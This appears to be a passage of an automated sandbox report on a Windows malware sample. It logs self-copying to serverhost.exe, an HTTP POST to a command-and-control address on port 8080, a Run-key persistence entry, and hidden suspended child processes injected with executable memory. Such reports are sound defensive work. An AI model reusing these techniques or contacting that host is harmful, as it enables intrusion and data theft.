| Check for Presence | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
499 |
| Information | Value |
|---|---|
| Total Data Sent | 0.32 KB (330 bytes) |
| Total Data Received | 60.59 KB (62044 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 74.208.155.175 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 74.208.155.175 |
| Server Port | 8080 |
| Username | 0 |
| Password | 0 |
| Data Sent | 0.32 KB (330 bytes) |
| Data Received | 60.59 KB (62044 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 74.208.155.175, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = 0 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Read Response | size = 62036, size_out = 62036 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:17 |
| Information | Value |
|---|---|
| PID | 0xbdc |
| Parent PID | 0xb04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE0
0x
BE4
0x
BE8
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | os_pid = 0xbec, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Get Handle | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe | base_address = 0xc40000 |
|
1 | |
| Get Filename | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\user32.dll | function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef63c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef65c |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2ef73c |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2ef73c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef73c |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2ef73c |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef73c |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MB66D4A35 |
|
1 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:10, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:15 |
| Information | Value |
|---|---|
| PID | 0xbec |
| Parent PID | 0xbdc (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BF0
0x
BF4
0x
BF8
0x
BFC
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | type = size |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ | type = file_attributes |
|
1 | |
| Move | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | source_filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe |
|
1 | |
| Delete | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | os_pid = 0xc04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x77140000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x755b0000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x76f00000 |
|
1 | |
| Load | userenv.dll | base_address = 0x74af0000 |
|
1 | |
| Load | wininet.dll | base_address = 0x77040000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x74180000 |
|
1 | |
| Get Handle | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe | base_address = 0xc40000 |
|
1 | |
| Get Filename | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 |
|
2 | ||
| Get Address | c:\windows\system32\user32.dll | function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef59c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2ef69c |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2ef69c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef69c |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2ef69c |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef69c |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef69c |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Create Mapping | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, desired_access = FILE_MAP_READ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
2 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| Get Time | type = Ticks, time = 104973 |
|
1 | |
| Get Time | type = Ticks, time = 105987 |
|
1 | |
| Get Time | type = Ticks, time = 106985 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MB66D4A35 |
|
1 | |
| Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Release | mutex_name = Global\I78B95E2E |
|
1 |
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:11 |
| Information | Value |
|---|---|
| PID | 0xc04 |
| Parent PID | 0xbec (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C08
0x
C10
0x
C14
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | os_pid = 0xc18, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Get Handle | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe | base_address = 0xc40000 |
|
1 | |
| Get Filename | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\user32.dll | function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x1cf74c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x1cf76c |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x1cf84c |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x1cf84c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x1cf84c |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x1cf84c |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x1cf84c |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x1cf84c |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MA991ED3B |
|
1 |
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:16, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:09 |
| Information | Value |
|---|---|
| PID | 0xc18 |
| Parent PID | 0xc04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C1C
0x
C20
0x
C24
0x
C28
0x
C2C
0x
C30
0x
C34
0x
C38
0x
C3C
0x
C40
0x
C44
0x
C48
0x
C4C
0x
C60
0x
C70
0x
C74
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\c570.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\c571.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\c572.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\c572.tmp | 0.11 KB (112 bytes) |
MD5:
f10107805ff54bb9c1e1cb047b604439
SHA1: 787f5296c509df55e9dea0f22ea76afaa8953676 SHA256: f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68 |
|
|
| c:\programdata\c571.tmp | 0.11 KB (112 bytes) |
MD5:
36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\email.doc | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\a\foobar.bmp | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Temp File | C:\ProgramData\C570.tmp | path = C:\ProgramData, prefix = 0 |
|
1 | |
| Create Temp File | C:\ProgramData\C571.tmp | path = C:\ProgramData, prefix = 0 |
|
1 | |
| Create Temp File | C:\ProgramData\C572.tmp | path = C:\ProgramData, prefix = 0 |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | type = size |
|
1 | |
| Delete | C:\ProgramData\C570.tmp |
|
1 | ||
| Delete | C:\ProgramData\C571.tmp |
|
1 | ||
| Delete | C:\ProgramData\C572.tmp |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | ||
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | ||
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" | os_pid = 0xc50, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" | os_pid = 0xc58, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" | os_pid = 0xc64, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc20 |
|
1 | |
| Get Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc30 |
|
1 | |
| Get Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc24 |
|
1 | |
| Set Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc20 |
|
1 | |
| Set Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc30 |
|
1 | |
| Set Context | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc24 |
|
1 | |
| Resume | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc20 |
|
1 | |
| Resume | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc30 |
|
1 | |
| Resume | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | os_tid = 0xc24 |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Allocate | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Allocate | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" | address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 |
|
1 | |
